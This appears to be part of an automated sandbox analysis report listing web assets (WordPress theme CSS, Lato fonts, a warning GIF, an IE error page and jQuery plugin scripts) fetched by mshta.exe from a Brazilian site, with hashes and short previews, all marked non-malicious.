                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2
                                        Preview:#sb_instagram{width:100%;margin:0 auto;padding:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#sb_instagram:after{content:"";display:table;clear:both}#sb_instagram.sbi_fixed_height{overflow:hidden;overflow-y:auto;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#sb_instagram #sbi_images{width:100%;float:left;line-height:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#sb_instagram .sbi_header_link{-webkit-box-shadow:none;box-shadow:none}#sb_instagram .sbi_header_link:hover{border:none}#sb_instagram #sbi_images .sbi_item{display:-moz-inline-stack;display:inline-block;float:left;vertical-align:top;zoom:1;max-height:1000px;padding:inherit!important;margin:0!important;text-decoration:none;opacity:1;overflow:hidden;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;-webkit-transition:all .5s ease;-moz-transition:all .5s ease;-o-transition:all .5s ease;-ms-transition:a
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):523
                                        Entropy (8bit):4.974103937872525
                                        Encrypted:false
                                        SSDEEP:12:UunKwXaF3fnVnDF1XHXaF3ZXm6FgJF+pCGdj+YzWIhXCqrI5kgO0x:1KwSPDtSkQDCujIRD5kp0x
                                        MD5:725008F7D019079BD5FDF435862F0AF5
                                        SHA1:0DC4AF129ECEAEE15B583F6F458AD7BD74988C4D
                                        SHA-256:5239B049D3CE0714FAF43DBDB19E1D8ADC0722AC05962AAA73215A9F4D87E8D0
                                        SHA-512:EA73CD39491E07FA099CE2508575447B0120DD919CCEEF4AEB831D064F75480BFF20C6F866E6075E25DE5A35526AAB1FC8E7ED069F7B5FF999DF3EC8D28F1BDA
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/style.css
                                        Preview:/*..Theme Name: cherry..Theme URI: //info.template-help.com/help/..Description: A theme for Wordpress 3.8.x..Author: Template_Help.com..Author URI: //info.template-help.com/help/..Version: 3.1.5.1..Tags: dark, light, white, black, gray, left-sidebar, right-sidebar, fixed-width, flexible-width, custom-menu, editor-style, featured-images, full-width-template, post-formats, rtl-language-support, sticky-post, theme-options, translation-ready..License:..License URI: http://..Text Domain: cherry.*/.@import "css/style.css";.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:GIF image data, version 89a, 36 x 38
                                        Category:downloaded
                                        Size (bytes):1062
                                        Entropy (8bit):4.517838839626174
                                        Encrypted:false
                                        SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                        MD5:124A9E7B6976F7570134B7034EE28D2B
                                        SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                        SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                        SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                        Malicious:false
                                        IE Cache URL:res://ieframe.dll/warning.gif
                                        Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:GIF image data, version 89a, 36 x 38
                                        Category:dropped
                                        Size (bytes):1062
                                        Entropy (8bit):4.517838839626174
                                        Encrypted:false
                                        SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                        MD5:124A9E7B6976F7570134B7034EE28D2B
                                        SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                        SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                        SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                        Malicious:false
                                        Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:Embedded OpenType (EOT), Lato Hairline family
                                        Category:downloaded
                                        Size (bytes):21906
                                        Entropy (8bit):7.967838538437944
                                        Encrypted:false
                                        SSDEEP:384:VFJHGuN6qSpebL2RIS+Xv4nRE0661wyGSD37OhAVT/VJqVL89X:VFTEqFbCOS+/cz1wyRD3+u/zqd8d
                                        MD5:AC3C05998D9A3A94292ADB42CA4402D0
                                        SHA1:F15C88C7820DACCFA39D9007E7BF98652D2DAA2C
                                        SHA-256:C27571B00544786FF1223F04E4254433CECB80A49DDC1605968FB8ED0FB2E46B
                                        SHA-512:30F0F74DB92E2D943D8994E6ED8E9E54CA47861AFCBC612D0002E4C97C0FF83E395FC258DC4C649283F9F8EF49A167A29BB4AC3840D0D7E072C4CCCF408119A3
                                        Malicious:false
                                        IE Cache URL:http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot
                                        Preview:.U...T............................LP'...J.............. ....@..y....................L.a.t.o. .H.a.i.r.l.i.n.e.....R.e.g.u.l.a.r...P.V.e.r.s.i.o.n. .1...1.0.4.;. .W.e.s.t.e.r.n.+.P.o.l.i.s.h. .o.p.e.n.s.o.u.r.c.e.....L.a.t.o.-.H.a.i.r.l.i.n.e.....BSGP...................`.=..>..50....`.W.hKr{z~"U:b,/.ezS..........-A.RC...x....E.57z.....%)..;".I^...s..N......!....*.-..m."....Yb..qrS.a..N..B....~......m..X._.^.V.".2...3Q..qM.nl....U.7..M.D..j..9..C..]..X...L'.s..:...[.b....x>...6.5}_.;.......v...s.`.......E....&.nV..M.(iy..Mi1...(q...........s..L.H.'y..O..CL..y......S...E.#@.l..............X.....A....0".Ju./..#.......]....5o8I..|.A...$...Q.qmE.m.q..@.Y...x..J4.$$.. ?...D...g.z..\fq...(o;LX.`U......J2Q..i..1....9......u....L.mSn.......t...d....).....[L7.0.}.A..E.m.P..F.i'h..........0..Z\...1.{.y..i..**...M@..M.6...h.ha`.`....!.H...K..y._.........t-..C..w.......Zi..P...\.<K...z4Q..\.....:jcU.......F.6.n.......F.>0@.a@.@.........|.d=...Re..sG..=.= ....X@..G...p;...
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:Embedded OpenType (EOT), Lato Black family
                                        Category:downloaded
                                        Size (bytes):25451
                                        Entropy (8bit):7.969770648296379
                                        Encrypted:false
                                        SSDEEP:768:HoV31fm0ipzey9jR/tzFC+THGz4x8SJG2Xeog:HoVFuNP/3CdSLOt
                                        MD5:0AD19DEC4DE4F225CBF95946B07F03F0
                                        SHA1:4ED5339BEAA5683AEAE65BB1E4B48A877EDDBB65
                                        SHA-256:9D42496620626D2D3AC3022B36A1671BEE2F23B86A147440C92316380FB30BBD
                                        SHA-512:22A7EC99DD4068291486B54832B895BD0766E5710DC0622FBF0A2FA3A2EB98EF12AB1B37210CAD603DF4709719E051D91F1ACCE17B9DC20E72C410AAE3A7D346
                                        Malicious:false
                                        IE Cache URL:http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eot
                                        Preview:kc..mb............................LP'...J.............. .....7.n....................L.a.t.o. .B.l.a.c.k.....R.e.g.u.l.a.r...P.V.e.r.s.i.o.n. .1...1.0.4.;. .W.e.s.t.e.r.n.+.P.o.l.i.s.h. .o.p.e.n.s.o.u.r.c.e.....L.a.t.o. .B.l.a.c.k.....BSGP.....................A^.G>.3........ZB....D...X,S..O...G.cu.b.>Nj....l.\t.bcA.85..N.~.X...l..%HL...a.EY.I.....zF........m.V..O.....x#E...:..T[q;Q....}.@`>..... cu)...4Y.9/.....:.._....d....-.9....NSe...NF.Q.5.(<,..C..F...>..~..p...t.....2.|5..p.c_.(B...H..*%........Ma.3Y..4$o...l .....@6...6.].]....... ......4@..t.B!.2.-.O...&.y.v.....4J@.E...TDCr..)..U..V..%.%.5.....7E.m_x"..<T...Il..O.%Q...x.5......]..fB.< .H..0h`......y..\.y.Q..&...O.........vs......t...|.GS0...H.:..].t.u....*..9..LBfb&&..A..L},..P.cOy...B.O%..H..UX<X=X>PCPk...H.Q..!T".A..4/\b..7..!...........W.|E...n...w0v....j;.....?<..w.Q.r.$$x......oy..O9...^...g@..r....9....vCr..v....m....MPOo..,"..(.E.f...?..d.M..hT.P.u..`d8_#....&.}...|k...>e...*;>1.O.$.P{..ao.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:Embedded OpenType (EOT), Lato family
                                        Category:downloaded
                                        Size (bytes):26118
                                        Entropy (8bit):7.970184406626934
                                        Encrypted:false
                                        SSDEEP:768:Il7bajNBleEzCTFhEctniWorQDzlIgJg4Qf06Fzq1qZ:IsjNe2SjtLor6lTcf0yzIqZ
                                        MD5:57425A0BD70ABEC6F5FD38D3B2507E89
                                        SHA1:6F7576213E3FCC093C38C96DB22EC701A1E6EAAA
                                        SHA-256:AB98070851F53310219E56128C117B5BA13BC63B822637B1B1103277C1E3010C
                                        SHA-512:6AC3F2676A83839DCEE79D501ABDE1FF4F04D818654489A949172800406E5F9034085C861BB4EB734F92478F870C795640C32D087FBCD3F9E25984B30E3A6FE4
                                        Malicious:false
                                        IE Cache URL:http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eot
                                        Preview:.f...e............................LP'...J.............. ....Z.i.....................L.a.t.o.....B.o.l.d...P.V.e.r.s.i.o.n. .1...1.0.4.;. .W.e.s.t.e.r.n.+.P.o.l.i.s.h. .o.p.e.n.s.o.u.r.c.e.....L.a.t.o. .B.o.l.d.....BSGP.....................C..I..4........ZB....D...X,S..O.......l.i...@.`..#....OjOz.....@....Y%hC..9......A..h...0..uH....n-)5.u[....W.u.....EE..j5.0.g......j'[.~.2Nv..le.'V.o.r........P}....c.....J.J.......j.2...>...(.*J.:g..W..Q..X...f..).>........./(.%.7(.".......f1.....v9......O4...@..].Kv..'.>......&H.c...0>..9#...}....I+#W....".%p&.Yr.I5.............S..,$...&m.&1. ..!..U..^Y.0413l.9 .Q.........{Csw....f....X.P'.....R216...=E.g.7..T..5..m.>c....C.O.}C.X.../y\.$ ......4.......u.R......R.+..G.S.I.I.*.D&....b....+.o....[@.#n.4.<.D....$a....y.+....A.K.rF.....`.\.Z.AQG.@mD.......'|.........80...c..a..5.{..Y8......9.q".!.....R<v...g3....B.T.]>.....#...x...0..<..D.._.=...t.:8....G]..;L...\q.F.C..f._.@..9g..kp...:N.HB..B..}.%..R..T%[.$z
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:Embedded OpenType (EOT), Lato Light family
                                        Category:downloaded
                                        Size (bytes):24456
                                        Entropy (8bit):7.962811770770542
                                        Encrypted:false
                                        SSDEEP:384:rD2u7JY1e7uWKgCWOv1x21IA3qjRD7yKbev6YyNPpEaQsclWZaXVCqDoH9Hjl9uL:NuW3vOv1sk1DWKC6YyeH9FVCVHJYpTIc
                                        MD5:D07A3DF5EB89A8BBEA764021336FC851
                                        SHA1:4168D287AB866CC21F47FC5DCF62B6871DFB210D
                                        SHA-256:79AD628A22C9AA1A8D30C9F5920D7F432F51804B9750BFE907C3A10D46CDB445
                                        SHA-512:BA7378D7DBA3C8BBAD610BAAE431339D121B0FE4B2876A1A1E87D9837053F6AC006490B959798B304BA6A96893D0250510FB077D556D2BCA056EE81A2A8970EB
                                        Malicious:false
                                        IE Cache URL:http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot
                                        Preview:._...^......................,.....LP'...J.............. ......N.....................L.a.t.o. .L.i.g.h.t.....R.e.g.u.l.a.r...P.V.e.r.s.i.o.n. .1...1.0.4.;. .W.e.s.t.e.r.n.+.P.o.l.i.s.h. .o.p.e.n.s.o.u.r.c.e.....L.a.t.o.-.L.i.g.h.t.....BSGP...................?.@..A..2~....`.W.hKr{z~"U:b,/.ezS..........-A.RC...x....E.57z.....%)..nE.'.....`!a........*.,~.[A.p2..X.8.\..XO.r*..F. N..k..P.[..]ooQ. ...zeX.....q....%4...nR....z.f.L.~6C.c...!..~Wi..V....z....h.......Z.*...&..MOx.N...6....twP,y3....;.b...I..mR.8..........f....9Z$..^....._..'...K..P%.Qz:..A..].....U..l.Z.ci}0.|. ."'`.<............0x..i..h...Ra.....h.V.v..../C"M..DH. .>.D..J.....U.....c....)"....X..$..0o..?#..a.ep..f..#L.f..F[B.R...!.n..l.4..y..<...1..}..4....F..v.y7..9...<.A.=..>..n3#.`}@j...D.b.....U.r........."....8.9.I......L...t.4....f.&...;D.....u0W.U..^Cy..>..Q..#.OQ[Xn..6...?U.FY....m...)K.AE.(8."...j...^...B....kc]....b.'..;A..v........U.9%.........r.....h..k..K..G..)..^..OwV>!=.w.H....`.v+(
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:Embedded OpenType (EOT), Lato family
                                        Category:downloaded
                                        Size (bytes):26669
                                        Entropy (8bit):7.969873501177376
                                        Encrypted:false
                                        SSDEEP:384:3o0KhHhcVoBbXSW9jDQfwYejcrqTGOBnhwHAVKnn5DwVGUDucy6RormfvtZk+:YP2Ob/DowqrMnhwHZntuHRy62rmf8+
                                        MD5:F0AA40EA96D1920A1A96329B4A35EDED
                                        SHA1:31E6A2EAF78903F0487F2DB6319D7A8E5186C218
                                        SHA-256:E745A8D2C87907FEE0267896B226BCAD1A2634A8C6826BC284F06875B14F0E60
                                        SHA-512:B22522660F8C966675003E592DE0A7338BB08E68456BBDF661FFAEC3CB9B33D71C63C870C30A0177A32AA2E1EF5014DF27F57D67AB21690D36FB0FF360722680
                                        Malicious:false
                                        IE Cache URL:http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot
                                        Preview:-h..7g............................LP'...J.............. ......>.....................L.a.t.o.....R.e.g.u.l.a.r...P.V.e.r.s.i.o.n. .1...1.0.4.;. .W.e.s.t.e.r.n.+.P.o.l.i.s.h. .o.p.e.n.s.o.u.r.c.e.....L.a.t.o. .R.e.g.u.l.a.r.....BSGP.....................B..H..3........ZB....D...X,S..O...G.cu.b.>Nj....l.\t.bcA.85..N.~.X...d..%HL...a.EY.I....QL...,.#0...m.V.E)...L7.E)......T[t;T.... 0.\y.b{l.d..Jplc.,.....*..9...K..}.Q..|..W...3.q..rt..G#W....q....&.V_.bh.ql..z[.>....,. ......1.AfE.....q.2.e...d.....+o>....)..1f..2.~.|.../.."..k0.).......Bzj"&~.J..pF1V3......Q..&R..H...O`..Z*.n.a.h@.e.Z.,<Ex./......%..#C....##...&. ..ub...{..x.h.TA.....0OA:.8....E...}...H...ZN.f...s..g&..~y.Q;9......;.X..S...x..g..I.O.JX.k............!...h_...........Q. .\L.^.f.n.t.|.Y..j)..G..{.....`.V..ZM.b.+.v-..X.XMQ......A.../..C....N......4Xi..a..e...v..?......=..4O......Og.S`.W.&..w.>...>.....Hu.......5....."...........r.._..M:.k...q..O9....Fy.2.1...y)..[.F4.d~.........0./...^L
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):107397
                                        Entropy (8bit):5.243343101333427
                                        Encrypted:false
                                        SSDEEP:768:+coRowFmqeuii6OZLzAX+cSXgx7fLLgkhB5aErf:JoZ5vLPXgx7ngkjd
                                        MD5:FE45C97743C9CAEC6809D9F740D52D3E
                                        SHA1:CB69497E1935DE69862E92400478B75CD13E23BD
                                        SHA-256:55225FFA7E115D65C7E0F7A602A59CF5EE1D2F3C873F88381375A550B1B6B548
                                        SHA-512:9D36A695AD9DF51C63E820184DBD320D4B05700598F7CAC344C182F3D340FF20027C877BFA6F0FAE6EF717F236A6B5E4BF22286787B337D0F0B47F2BDD79693B
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css
                                        Preview:article, aside, details, figcaption, figure, footer, header, hgroup, nav, section { display:block; }.audio, canvas, video {..display:inline-block;..*display:inline;..*zoom:1;.}.audio:not([controls]) { display:none; }.html {..font-size:100%;..-webkit-text-size-adjust:100%;..-ms-text-size-adjust:100%;.}.a:focus {..outline:thin dotted #333;..outline:5px auto -webkit-focus-ring-color;..outline-offset:-2px;.}.a:hover, a:active { outline:0; }.sub, sup {..position:relative;..font-size:75%;..line-height:0;..vertical-align:baseline;.}.sup { top:-0.5em; }.sub { bottom:-0.25em; }.img {..max-width:100%;..width:auto \9;..height:auto;..vertical-align:middle;..border:0;..-ms-interpolation-mode:bicubic;.}.#map_canvas img, .google-maps img { max-width:none; }.button, input, select, textarea {..margin:0;..font-size:100%;..vertical-align:middle;.}.button, input {..*overflow:visible;..line-height:normal;.}.button::-moz-focus-inner, input::-moz-focus-inner {..padding:0;..border:0;.}.button, html input[type
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):39402
                                        Entropy (8bit):5.336241934125691
                                        Encrypted:false
                                        SSDEEP:768:HUp+FrGU1OYvR7qO218kwiA2gRDLMjmQyrshT7Db3E8J1KTuDvniryxn7OqOPOtb:6fU1Ox62LvniFFl3D+
                                        MD5:4338F6FCF6F5F1332747A94E09A65DF4
                                        SHA1:099715E7293A8B570C46779C7A28B6832E34B72A
                                        SHA-256:CAD3B6107C8A8F38229ADD27D02A2150E204BA78ACC54144E132A20BA40FC3FE
                                        SHA-512:1120EC4FB4B981CDDF49F4B9933660F74A8B4B03746B5B329925E32FE5ABD13A675ACBBC8A53A2E2AB4F5C575256D0577B282236A60EEBA977232122577D3DB5
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4
                                        Preview:// Camera slideshow v1.3.4 - a jQuery slideshow with many effects, transitions, easy to customize, using canvas and mobile ready, based on jQuery 1.4+.// Copyright (c) 2012 by Manuel Masia - www.pixedelic.com.// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php.;(function(a){a.fn.camera=function(b,c){function e(){if(navigator.userAgent.match(/Android/i)||navigator.userAgent.match(/webOS/i)||navigator.userAgent.match(/iPad/i)||navigator.userAgent.match(/iPhone/i)||navigator.userAgent.match(/iPod/i)){return true}}function H(){var b=a(s).width();a("li",s).removeClass("camera_visThumb");a("li",s).each(function(){var c=a(this).position(),d=a("ul",s).outerWidth(),e=a("ul",s).offset().left,f=a("> div",s).offset().left,g=f-e;if(g>0){a(".camera_prevThumbs",V).removeClass("hideNav")}else{a(".camera_prevThumbs",V).addClass("hideNav")}if(d-g>b){a(".camera_nextThumbs",V).removeClass("hideNav")}else{a(".camera_nextThumbs",V).addClass("hideNav")}var h=c.left,i=c.left+
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):26264
                                        Entropy (8bit):5.17784391797181
                                        Encrypted:false
                                        SSDEEP:192:D4Js/c+wkDZnVwkExwkBxN7ZDFBxJbtLwb/+luajba3RI4zQDaRzBBpCJyJUt:OeZnMRUCJyJUt
                                        MD5:4801E1D3D131C3628342CAACC406479D
                                        SHA1:3078A5FC945049A7B9E90829123ACAE900C74324
                                        SHA-256:3DF13F8DC45F6168A5EFF9BB8F32FA6807BA3EFE0DB1F76CE808BB7B0F48CA01
                                        SHA-512:9863D94FECA024EE25B8D1F93F20D0E2E86A9E884C6E3325149DE148F12F54DF82DF2FA0995FBC3FC3C66B4AB15382251703CEE2C7A623CCB86B19601B9E6B1D
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.css
                                        Preview:/**************************.*.*.GENERAL.*.**************************/..camera_wrap a, .camera_wrap img, ..camera_wrap ol, .camera_wrap ul, .camera_wrap li,..camera_wrap table, .camera_wrap tbody, .camera_wrap tfoot, .camera_wrap thead, .camera_wrap tr, .camera_wrap th, .camera_wrap td..camera_thumbs_wrap a, .camera_thumbs_wrap img, ..camera_thumbs_wrap ol, .camera_thumbs_wrap ul, .camera_thumbs_wrap li,..camera_thumbs_wrap table, .camera_thumbs_wrap tbody, .camera_thumbs_wrap tfoot, .camera_thumbs_wrap thead, .camera_thumbs_wrap tr, .camera_thumbs_wrap th, .camera_thumbs_wrap td {..background: none;..border: 0;..font: inherit;..font-size: 100%;..margin: 0;..padding: 0;..vertical-align: baseline;..list-style: none.}..camera_wrap {..display: none;..float: left;..position: relative;..z-index: 0;.}..camera_wrap img {..max-width: none!important;.}..camera_fakehover {..height: 100%;..min-height: 60px;..position: relative;..width: 100%;..z-index: 1;.}..camera_wrap {..width: 100%;.}..camera_sr
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):2778
                                        Entropy (8bit):4.92970371310333
                                        Encrypted:false
                                        SSDEEP:48:xLnN+tyKOxwaPYuxwFAmKldNzr1JhxPE63haDJ77LMeHrc76cCgP:hTPCoEt6
                                        MD5:CCD1C11A6BA5DF0CBFC470B04A3739F4
                                        SHA1:A8864D81DE7689672EF8F916E430AAABF563C22D
                                        SHA-256:A6BA246C6B7B60AFFBB369C8884D172DD3E4702A594F09BBA678A7773A25E411
                                        SHA-512:31F7B74A31E796534D0F51BD9BC9004BDD30EE896D987300A220DADAA526753C9C6D00081F4E9D18EA2BF875C776D6ED55CBA62404B22534BCD45A277EC45A79
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0
                                        Preview:/*! device.js 0.1.58 */.(function(){var a,b,c,d,e,f,g,h,i,j;a=window.device,window.device={},c=window.document.documentElement,j=window.navigator.userAgent.toLowerCase(),device.ios=function(){return device.iphone()||device.ipod()||device.ipad()},device.iphone=function(){return d("iphone")},device.ipod=function(){return d("ipod")},device.ipad=function(){return d("ipad")},device.android=function(){return d("android")},device.androidPhone=function(){return device.android()&&d("mobile")},device.androidTablet=function(){return device.android()&&!d("mobile")},device.blackberry=function(){return d("blackberry")||d("bb10")||d("rim")},device.blackberryPhone=function(){return device.blackberry()&&!d("tablet")},device.blackberryTablet=function(){return device.blackberry()&&d("tablet")},device.windows=function(){return d("windows")},device.windowsPhone=function(){return device.windows()&&d("phone")},device.windowsTablet=function(){return device.windows()&&d("touch")},device.fxos=function(){return(
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3247
                                        Entropy (8bit):5.459946526910292
                                        Encrypted:false
                                        SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                        MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                        SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                        SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                        SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                        Malicious:false
                                        Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):8844
                                        Entropy (8bit):5.1067637688011125
                                        Encrypted:false
                                        SSDEEP:96:dv+TrZD5ip1yplBpElBpqdpw2pu9pA2/U7F2SOZ9lKMBIfpxTb8CGK2jhsBdy8bp:d0BCIZWBgVkSDSmmhDIHK4wVYH4cUdb0
                                        MD5:F05AC1D7BF95BA34B8BCB05D4455D2E6
                                        SHA1:F27305CA2CBCCA78715683611FFF72DF3F1359CD
                                        SHA-256:6D7D547D752E1999718DD64FD26DDEFA7EEDADBB11A6461248C520BEAF0D6022
                                        SHA-512:C05432C613C91ABAB1BE1B564278400DEEAEDEDE50528A928CD9ADE047899FB4EE55D5843845D286450CA38EA440C00021CFD3F93873547D7F53BAF138096AF3
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0
                                        Preview:/*. * Playlist Object for the jPlayer Plugin. * http://www.jplayer.org. *. * Copyright (c) 2009 - 2013 Happyworm Ltd. * Dual licensed under the MIT and GPL licenses.. * - http://www.opensource.org/licenses/mit-license.php. * - http://www.gnu.org/copyleft/gpl.html. *. * Author: Mark J Panaghiston. * Version: 2.3.0. * Date: 20th April 2013. *. * Requires:. * - jQuery 1.7.0+. * - jPlayer 2.3.0+. */.(function(b,f){jPlayerPlaylist=function(a,c,d){var e=this;this.current=0;this.removing=this.shuffled=this.loop=!1;this.cssSelector=b.extend({},this._cssSelector,a);this.options=b.extend(!0,{keyBindings:{next:{key:39,fn:function(){e.next()}},previous:{key:37,fn:function(){e.previous()}}}},this._options,d);this.playlist=[];this.original=[];this._initPlaylist(c);this.cssSelector.title=this.cssSelector.cssSelectorAncestor+" .jp-title";this.cssSelector.playlist=this.cssSelector.cssSelectorAncestor+" .jp-playlist";.this.cssSelector.next=this.cssSelector.cssSelectorAncestor+" .jp-next";this.cssSel
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):54355
                                        Entropy (8bit):5.24962012461709
                                        Encrypted:false
                                        SSDEEP:1536:7csOF0XSMqEk3nRw9o5cfQPfu5+6Vo5aUuyEwVUEn6:7f4dfPfu51W53EWR6
                                        MD5:8FBB3319230D3C08397B7BDA5BCB1DC2
                                        SHA1:E7C9CBBFA4EC48771C03878949AD0A4128BABF62
                                        SHA-256:493DB6D1EC51719B44E204D0594B5BCBDC81CE173A64D3E90513A468CECBD383
                                        SHA-512:0BEA93F519BD1D9C10D41A8345807CBCE0D5C8C0FCF98D4B325EA00587474E05138C279469AECB0A3D0054A2941E380E6EC5839D7A6230697CD23F6DFC0718D0
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0
